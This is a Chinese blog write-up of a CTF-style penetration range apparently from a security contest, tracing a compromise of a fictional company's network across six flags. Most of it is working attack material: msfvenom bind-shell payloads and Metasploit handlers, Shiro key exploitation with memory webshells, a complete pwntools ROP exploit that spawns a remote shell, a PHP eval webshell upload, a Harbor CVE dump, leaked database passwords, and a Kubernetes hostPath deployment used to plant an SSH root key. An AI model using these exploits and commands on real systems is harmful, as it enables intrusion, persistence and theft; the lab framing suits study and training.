靶机渗透-第一届铁三三项赛半决赛渗透-GreatWall | 风尘孤狼
0%

靶机渗透-第一届铁三三项赛半决赛渗透-GreatWall

image-20240717161300537

靶标介绍

在这个靶场中,您将扮演一名渗透测试工程师,接受雇佣任务来评估“SmartLink Technologies Ltd.”公司的网络安全状况。 您的任务是首先入侵该公司暴露在公网上的应用服务,然后运用后渗透技巧深入 SmartLink公司的内部网络。在这个过程中,您将寻找潜在的弱点和漏洞,并逐一接管所有服务,从而控制整个内部网络。靶场中共设置了6个Flag,它们分布在不同的靶机上,您需要找到并获取这些 Flag 作为您的成就目标。

first-flag

开头得到一个IP,信息搜集

8.130.86.165

nmap探测一下

Starting Nmap 7.95 ( https://nmap.org ) at 2024-07-17 16:18 中国标准时间
Nmap scan report for 8.130.86.165
Host is up (0.029s latency).
Not shown: 983 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1024/tcp filtered kdm
1025/tcp filtered NFS-or-IIS
1033/tcp filtered netinfo
1068/tcp filtered instl_bootc
1433/tcp filtered ms-sql-s
4444/tcp filtered krb524
5800/tcp filtered vnc-http
5900/tcp filtered vnc
6129/tcp filtered unknown
6667/tcp filtered irc
8080/tcp open     http-proxy

80和8080各有一个web服务,80是个网站的官网,8080是个登录入口,如下

image-20240717162001948 image-20240717162033580

弱口令等基础漏洞无果,扫描一下目录

---- Scanning URL: http://8.130.86.165/ ----
==> DIRECTORY: http://8.130.86.165/css/                                                                                    
==> DIRECTORY: http://8.130.86.165/fonts/                                                                                  
==> DIRECTORY: http://8.130.86.165/images/                                                                                 
+ http://8.130.86.165/index.html (CODE:200|SIZE:10887)                                                                     
==> DIRECTORY: http://8.130.86.165/js/                                                                                     
+ http://8.130.86.165/server-status (CODE:403|SIZE:277)                                                                    
                                                                                                                           
---- Entering directory: http://8.130.86.165/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
---- Entering directory: http://8.130.86.165/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
---- Entering directory: http://8.130.86.165/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
---- Entering directory: http://8.130.86.165/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

都是一些不重要的路径,8080如下,也是没啥关键信息

---- Scanning URL: http://8.130.86.165:8080/ ----
+ http://8.130.86.165:8080/index.php (CODE:200|SIZE:1027)                                                                  
+ http://8.130.86.165:8080/robots.txt (CODE:200|SIZE:24)                                                                   
+ http://8.130.86.165:8080/server-status (CODE:403|SIZE:279)                                                               
==> DIRECTORY: http://8.130.86.165:8080/static/

直接用fscan扫描一下,发现登录入口是存在TP5.0.23的RCE漏洞的,工具一把梭

start vulscan
[*] WebTitle: http://8.130.86.165       code:200 len:10887  title:None
[*] WebTitle: http://8.130.86.165:8080  code:200 len:1027   title:Login Form
[+] http://8.130.86.165:8080 poc-yaml-thinkphp5023-method-rce poc1

在根目录下得到flag1

/f1ag01_UdEv.txt

flag01: flag{176f49b6-147f-4557-99ec-ba0a351e1ada}

查看网卡信息

(www-data:/var/www/html/background/public) $ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.28.23.17  netmask 255.255.0.0  broadcast 172.28.255.255
        inet6 fe80::216:3eff:fe03:f089  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:03:f0:89  txqueuelen 1000  (Ethernet)
        RX packets 110635  bytes 75481457 (75.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 70843  bytes 22069897 (22.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1308  bytes 127326 (127.3 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1308  bytes 127326 (127.3 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

上传fscan扫描网段服务

./fscan -h 172.28.23.17/24

扫到内网服务,结果如下

172.28.23.26:80 open
172.28.23.17:80 open
172.28.23.17:22 open
172.28.23.26:22 open
172.28.23.33:22 open
172.28.23.26:21 open
172.28.23.33:8080 open
172.28.23.17:8080 open
[*] WebTitle: http://172.28.23.17:8080  code:200 len:1027   title:Login Form
[*] WebTitle: http://172.28.23.26       code:200 len:13693  title:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
[*] WebTitle: http://172.28.23.17       code:200 len:10887  title:None
[+] ftp://172.28.23.26:21:anonymous 
   [->]OASystem.zip
[*] WebTitle: http://172.28.23.33:8080  code:302 len:0      title:None 跳转url: http://172.28.23.33:8080/login;jsessionid=780BE0921163759119444BAE668B0C2A
[*] WebTitle: http://172.28.23.33:8080/login;jsessionid=780BE0921163759119444BAE668B0C2A code:200 len:3860   title:智联科技 ERP 后台登陆
[+] http://172.28.23.17:8080 poc-yaml-thinkphp5023-method-rce poc1
[+] http://172.28.23.33:8080 poc-yaml-spring-actuator-heapdump-file 
[+] http://172.28.23.33:8080 poc-yaml-springboot-env-unauth spring2

搭建内网代理,这里使用msf搭建,先生成一个msf正向马

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=53857 -f elf > hzy

开启监听

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 8.130.86.165
set lport 53857
run

添加内网路由

run post/multi/manage/autoroute
meterpreter > route

IPv4 network routes
===================

    Subnet          Netmask      Gateway         Metric  Interface
    ------          -------      -------         ------  ---------
    0.0.0.0         0.0.0.0      172.28.255.253  100     eth0
    172.28.0.0      255.255.0.0  0.0.0.0         0       eth0
    172.28.255.253  0.0.0.0      0.0.0.0         100     eth0

No IPv6 routes were found.
meterpreter > run post/multi/manage/autoroute

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: linux
[*] Running module against 172.28.23.17
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.28.0.0/255.255.0.0 from host's routing table.

成功上线shell,搭建socks5代理

192.168.72.149 1080

second-flag

开始内网的服务访问,首先先根据fscan扫描的结果定向访问

http://172.28.23.33:8080

这地址存在heapdump泄露,先搞这个

image-20240717164327802

看这个路径不难发现大概是shiro框架,抓包测试的确发现了shiro特征

image-20240717164448748

扫描找heapdump

/actuator/env
/actuator/heapdump

使用工具快速分析提取关键数据,可以得到shiro的key

image-20240717171025760
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES

工具走代理,填充key爆破链子即可

这里需要注意工具这里需要勾选上AES GCM,因为泄露出来的algMode = GCM

image-20240717171232305

命令执行,写入内存马

image-20240717171408122
冰蝎[Filter]  注入成功!
路径:http://172.28.23.33:8080/1.ico
密码:123

成功RCE

image-20240717171519211

查看网卡情况,发现存在双网卡,也就是存在内网服务

/ >ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.28.23.33  netmask 255.255.0.0  broadcast 172.28.255.255
        inet6 fe80::216:3eff:fe04:93d5  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:04:93:d5  txqueuelen 1000  (Ethernet)
        RX packets 95489  bytes 82892482 (82.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 46479  bytes 544617803 (544.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.10.16  netmask 255.255.255.0  broadcast 172.22.10.255
        inet6 fe80::216:3eff:fe04:62e  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:04:06:2e  txqueuelen 1000  (Ethernet)
        RX packets 687  bytes 28854 (28.8 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 702  bytes 30000 (30.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1308  bytes 133017 (133.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1308  bytes 133017 (133.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

查看端口开放情况

/ >netstat -anupl
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 172.28.23.33:68         0.0.0.0:*                           -                   
udp        0      0 127.0.0.1:323           0.0.0.0:*                           -                   
udp6       0      0 ::1:323                 :::*                                -                   
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
/ >netstat -tulnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:59696           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::8080                 :::*                    LISTEN      649/java            
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 172.28.23.33:68         0.0.0.0:*                           -                   
udp        0      0 127.0.0.1:323           0.0.0.0:*                           -                   
udp6       0      0 ::1:323                 :::*                                -                   
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)

发现有个高端位的服务,尝试发现是PWN服务,exp如下

from pwn import *
context.arch='amd64'

def add(key,data='b'):
    p.sendlineafter(b'Option:',b'1')
    p.sendlineafter(b'Key:',key)
    p.sendlineafter(b'Data:',data)

def show(key):
    p.sendlineafter(b'Option:',b'2')
    p.sendlineafter(b"Key: ",key);

def edit(key,data):
    p.sendlineafter(b'Option:',b'3')
    p.sendlineafter(b'Key:',key)
    p.sendlineafter(b'Data:',data)

def name(username):
    p.sendlineafter(b'Option:',b'4')
    p.sendlineafter(b'name:',username)


p = remote('172.28.23.33', 59696)
# p = process('./HashNote')


username=0x5dc980
stack=0x5e4fa8
ukey=b'\x30'*5+b'\x31'+b'\x44'

fake_chunk=flat({
    0:username+0x10,
    0x10:[username+0x20,len(ukey),\
        ukey,0],
    0x30:[stack,0x10]
    },filler=b'\x00')

p.sendlineafter(b'name',fake_chunk)
p.sendlineafter(b'word','freep@ssw0rd:3')

add(b'\x30'*1+b'\x31'+b'\x44',b'test')   # 126
add(b'\x30'*2+b'\x31'+b'\x44',b'test')   # 127


show(ukey)
main_ret=u64(p.read(8))-0x1e0




rdi=0x0000000000405e7c # pop rdi ; ret
rsi=0x000000000040974f # pop rsi ; ret
rdx=0x000000000053514b # pop rdx ; pop rbx ; ret
rax=0x00000000004206ba # pop rax ; ret
syscall=0x00000000004560c6 # syscall

fake_chunk=flat({
    0:username+0x20,
    0x20:[username+0x30,len(ukey),\
        ukey,0],
    0x40:[main_ret,0x100,b'/bin/sh\x00']
    },filler=b'\x00')

name(fake_chunk.ljust(0x80,b'\x00'))


payload=flat([
    rdi,username+0x50,
    rsi,0,
    rdx,0,0,
    rax,0x3b,
    syscall
    ])

p.sendlineafter(b'Option:',b'3')
p.sendlineafter(b'Key:',ukey)
p.sendline(payload)
p.sendlineafter(b'Option:',b'9')
p.interactive()
image-20240717174722414
flag03:flag{6a326f94-6526-4586-8233-152d137281fd}

third-flag

上传fscan扫描一下另外一个网段

./fscan -h 172.22.10.16/24

结果如下,没啥价值内容

172.22.10.16:8080 open
172.22.10.28:3306 open
172.22.10.28:80 open
172.22.10.16:22 open
172.22.10.28:22 open
[*] WebTitle: http://172.22.10.16:8080  code:302 len:0      title:None 跳转url: http://172.22.10.16:8080/login;jsessionid=9693A38E81A24F057146E1490FB3D549
[*] WebTitle: http://172.22.10.16:8080/login;jsessionid=9693A38E81A24F057146E1490FB3D549 code:200 len:3860   title:智联科技 ERP 后台登陆
[*] WebTitle: http://172.22.10.28       code:200 len:1975   title:DooTask
[+] http://172.22.10.16:8080 poc-yaml-spring-actuator-heapdump-file 
[+] http://172.22.10.16:8080 poc-yaml-springboot-env-unauth spring2

同时有个FTP未授权,直接走代理把OA源码拖下来

image-20240717165825057

这样FTP有个注意点就是我这里用的是winscp这个工具,对于所有工具,未授权连接FTP的时候,走代理的场景下是需要开启被动模式的,要不然就连接不上FTP服务器,当然了如果记不住是要开启被动模式还是关闭,那就都试一试,在这里说这就是为了要记住有个FTP连接的被动模式的情况。

审计OA代码,考察代码审计

uploadbase64.php此处可以上传文件,代码如下

<?php
$img = $_POST['imgbase64'];
if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $img, $result)) {
    $type = ".".$result[2];
    $path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;
}
$img =  base64_decode(str_replace($result[1], '', $img));
@file_put_contents($path, $img);
exit('{"src":"'.$path.'"}');

限制格式必须得是data读取base64编码内容

data:image/jpg;base64,xxx
image-20240717175623326

成功上传PHP木马

imgbase64=data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==
image-20240717175728113

有很多disfunction,直接用蚁剑插件绕过即可

/upload/.antproxy.php直接这样访问显示404,修改一下/upload/的源码内容,路径加一个uploads/

image-20240717180059539

这里发现还是不能提权连接.antproxy.php,把木马文件中的POST改成GET,路径也改一下,然后get传参命令执行就可以,得到这个服务器的一个flag

image-20240717180402035

读文件的好多命令也给过滤了,应该是需要提权,毕竟www权限太低,可以看一下suid

find / -perm -u=s -type f 2>/dev/null

/bin/fusermount
/bin/ping6
/bin/mount
/bin/su
/bin/ping
/bin/umount
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/staprun
/usr/bin/base32
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/s-nail/s-nail-privsep

发现base32在里面,那就不用提权了,直接用base32读文件即可

这里用base32来读取flag

http://172.28.23.26/upload/.antproxy.php?1=echo `base32 /flag02.txt`;
MZWGCZZQGI5CAZTMMFTXWNJWMQZTONZTGQWTKZRXGMWTINBXMYWWEMLBGUWWCOBTMY2DKNJUHFRD EOD5BI======

flag02: flag{56d37734-5f73-447f-b1a5-a83f45549b28}

fourth-flag

看一下这个靶机的网卡情况


eth0      Link encap:Ethernet  HWaddr 00:16:3e:04:5b:6e  
          inet addr:172.28.23.26  Bcast:172.28.255.255  Mask:255.255.0.0
          inet6 addr: fe80::216:3eff:fe04:5b6e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:59474 errors:0 dropped:0 overruns:0 frame:0
          TX packets:23798 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:62043614 (62.0 MB)  TX bytes:16736593 (16.7 MB)

eth1      Link encap:Ethernet  HWaddr 00:16:3e:03:fe:6e  
          inet addr:172.22.14.6  Bcast:172.22.255.255  Mask:255.255.0.0
          inet6 addr: fe80::216:3eff:fe03:fe6e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1362 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1366 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:58300 (58.3 KB)  TX bytes:58332 (58.3 KB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:691 errors:0 dropped:0 overruns:0 frame:0
          TX packets:691 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:76373 (76.3 KB)  TX bytes:76373 (76.3 KB)

也是双网卡结构,上传fscan来扫描另外一个网段,同时正向马上线msf,蚁剑一点命令都执行不了,直接用刚才那个GET马来上线msf和执行fscan

cd /tmp;chmod +x fscan;./fscan -h 172.22.14.6/24

这里需要用第二个msf,走第一个msf的第一层代理才能正向监听到shell

同样的操作,先生成正向马

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=53857 -f elf > hzy
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 172.28.23.26
set lport 53857
run
image-20240717184453310

成功得到shell,在这一个msf上加这一层路由,即可继续内网渗透,当然还是先fscan扫描一下

chmod 777 /tmp/fscan

cd /tmp;./fscan -h 172.22.14.6/24

到这里,最开始的shell掉线了而且一直连不上了,这里重新生成一个新端口的正向马

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=53858 -f elf > hzy

刚才扫的结果在重新代理之后也是获取到了,如下

172.22.14.6:80 open
172.22.14.6:22 open
172.22.14.37:10250 open
172.22.14.46:22 open
172.22.14.37:22 open
172.22.14.37:2379 open
172.22.14.46:80 open
172.22.14.6:21 open
[*] WebTitle: http://172.22.14.46       code:200 len:785    title:Harbor
[*] WebTitle: http://172.22.14.6        code:200 len:13693  title:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
[+] InfoScan:http://172.22.14.46       [Harbor] 
[*] WebTitle: https://172.22.14.37:10250 code:404 len:19     title:None
[+] ftp://172.22.14.6:21:anonymous 
   [->]OASystem.zip
[+] http://172.22.14.46/swagger.json poc-yaml-swagger-ui-unauth [{path swagger.json}]

这里也是放弃MSF了,用frp或者stowaway,这俩比较稳定,后者搭建内网代理更是既稳定又方便,这里我用VPS,比赛的时候可以用自己的私网IP

第一层边缘机上传linux_x64_agent

./linux_x64_agent -c VPS:9999

VPS执行如下

./linux_x64_admin -l 9999
socks 5555

开启socks5代理

(node 0) >> socks 5555
[*] Trying to listen on 0.0.0.0:5555......
[*] Waiting for agent's response......
[*] Socks start successfully!

直接用新翔OA (172.28.23.26)连接到ThinkPHP (172.28.23.17),做第二层代理

(admin) >> use 0
(node 0) >> listen
[*] BE AWARE! If you choose IPTables Reuse or SOReuse,you MUST CONFIRM that the node you're controlling was started in the corresponding way!
[*] When you choose IPTables Reuse or SOReuse, the node will use the initial config(when node started) to reuse port!
[*] Please choose the mode(1.Normal passive/2.IPTables Reuse/3.SOReuse): 1
[*] Please input the [ip:]<port> : 1111
[*] Waiting for response......
[*] Node is listening on 1111

然后在172.28.23.26这上传linux_x64_agent,然后执行如下命令

./linux_x64_agent -c 172.28.23.17:1111

执行之后即可接收到一个node

(node 0) >> 
[*] New node come! Node id is 2

这个时候前边开的socks5就会自动加上172.28.23.26的网卡,直接访问服务即可,如下

http://172.22.14.46
image-20240717204413564

harbor未授权,CVE-2022-46463,直接打

>python harbor.py
usage: harbor.py [-h] [--v2] [--dump IMAGENAME | --tags | --dump_all] url
harbor.py: error: the following arguments are required: url
>python harbor.py  http://172.22.14.46/
[*] API version used v2.0
[+] project/projectadmin
[+] project/portal
[+] library/nginx
[+] library/redis
[+] harbor/secret
>python harbor.py  http://172.22.14.46/ --dump harbor/secret --v2
[+] Dumping : harbor/secret:latest
    [+] Downloading : 58690f9b18fca6469a14da4e212c96849469f9b1be6661d2342a4bf01774aa50

得到flag

image-20240717205900034
flag05: flag{8c89ccd3-029d-41c8-8b47-98fb2006f0cf}

fifth-flag

上边还有一个服务DooTask

http://172.22.10.28
image-20240717210112724

dump下来[+] project/projectadmin这个镜像,里面是dootask的源码jar包

image-20240717210614793 image-20240717210655734

反编译之后发现数据库连接信息泄露

BOOT-INF/classes/application.properties
spring.datasource.url=jdbc:mysql://172.22.10.28:3306/projectadmin?characterEncoding=utf-8&useUnicode=true&serverTimezone=UTC
spring.datasource.username=root
spring.datasource.password=My3q1i4oZkJm3
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver

mybatis.type-aliases-package=com.smartlink.projectadmin.entity
mybatis.mapper-locations=classpath:mybatis/mapper/*.xml

直接走代理连接即可,这里用Multiple.Database.Utilization.Tools这个工具,它可以连接之后直接尝试一些提权操作,节约时间

image-20240717211429038

一键提权成功

image-20240717211505530

得到flag6

image-20240717211524262
flag06: flag{413ac6ad-1d50-47cb-9cf3-17354b751741}

sixth-flag

这个不容易发现,前面最开始是扫到了一个高端位的404的web服务的

[*] WebTitle: https://172.22.14.37:10250 code:404 len:19     title:None
image-20240717211730001

这里没了解过的真的无从下手,考察的是K8S Kubelet未授权访问漏洞,特征就是10250端口开放,不过这里10250没办法利用,目前知道是K8s,可以试一试其他端口的未授权,比如10255,6443等等,这里访问6443的时候存在接口泄露

image-20240717212418939

接着就是利用漏洞了,编辑恶意yaml

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  labels:
    app: nginx
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx:1.8
        volumeMounts:
        - mountPath: /mnt
          name: test-volume
      volumes:
      - name: test-volume
        hostPath:
          path: /

先在win下安装kubectl.exe,后续需要利用到

https://kubernetes.io/zh-cn/docs/tasks/tools/install-kubectl-windows/

部署pod

kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/  apply -f evil.yaml
>kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/  apply -f evil.yaml
Please enter Username: 1
Please enter Password: deployment.apps/nginx-deployment configured

列出pod

kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods -n default
>kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods -n default
Please enter Username: 1
Please enter Password: NAME                                READY   STATUS    RESTARTS   AGE
nginx-deployment-864f8bfd6f-pfhwq   1/1     Running   0          35s

进容器建shell

kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-pfhwq /bin/bash
>kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-pfhwq /bin/bash
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
Please enter Username: 1
root@nginx-deployment-864f8bfd6f-pfhwq:/#
root@nginx-deployment-864f8bfd6f-pfhwq:/#
root@nginx-deployment-864f8bfd6f-pfhwq:/#
root@nginx-deployment-864f8bfd6f-pfhwq:/# ls
bin  boot  dev  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var

成功shell,然后写公钥

公钥是ssh-keygen -t rsa -b 4096产生的id_rsa.pub

ssh-keygen -t rsa -b 4096
cat /home/kali/.ssh/id_rsa.pub  //这个内容就是
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC0KpzPU1zUkOYCXEe+ZNp8IBjpTOJVzWyrd44BQC9weUhK2UDXvg+dh65IH1UrQk1jzfa4r5DHhRRn0jhtcUZINF7LGvz1EiV90P7y+qg3D6bn3oTGat2qLElC0cRZA9ZIycyRCXl18c7vGl9453K0WIJtha3aptoZ5ZYpJAil+MmEQ+J/PSn0Nj41UeatFmsCht9lCo6Fm2zhIjWInF4E/hou5V97VUS77bEPmGMW1cT6WkZpBnO6PjjtgEyEucwTXCOS0PUbeUjjeMw5kZduiwAkQZ3S8Rzys9JQor6NJOe4KB4mYD/Vk1EWJnMDxN51VjDNGDP5qCy6Za45imXdFm15/fdiOodJyIygQCL/oqpSqjHwSAuNEU7GhPu+kwBNe2/O09qgjfNRKPKbkPf2PuqkUPLnRlURAzmuXi9+aHfnH0pT15pSYCHqBlNiYSts/izH3fnB3Kf0SLvpLvnPQzP3abWqKJcERjpBjdY5EB5b7VIR6Ka1IJPlGtDvyiFiw7dm9sHixOfIKPe3ZV2Qfbs+7l1xhfcpA2blOx6j/LUnm/UX3JpaUAIJJx1+arJreNXd16ox+ILhHUIx8QYMQLvDrLDpmIcSAwdG9gqNZAgvkVkrymY4utBIcyRojM9Hr7MAnKzq/ZSKDU0qXW9KjXWTgdzKgtn4dp49+0MyQw== kali@kali" > /mnt/root/.ssh/authorized_keys

接着利用私钥连上去

proxychains ssh -i  /home/kali/.ssh/id_rsa root@172.22.14.37
image-20240717213924103

获得root权限,数据库弱口令

mysql -uroot -p
root

去mysql找到flag

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| flaghaha           |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql> use flaghaha;
mysql> show tables;
+--------------------+
| Tables_in_flaghaha |
+--------------------+
| flag04             |
+--------------------+
1 row in set (0.01 sec)

mysql> select * from  flag04;
+------+--------------------------------------------------------------+
| id   | f1agggggishere                                               |
+------+--------------------------------------------------------------+
|    1 | ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg== |
+------+--------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> 

得到flag

flag{da69c459-7fe5-4535-b8d1-15fff496a29f}

OVER

image-20240717214256913

参考

PWN脚本

GOOD

GOOD

制作不易,如若感觉写的不错,欢迎打赏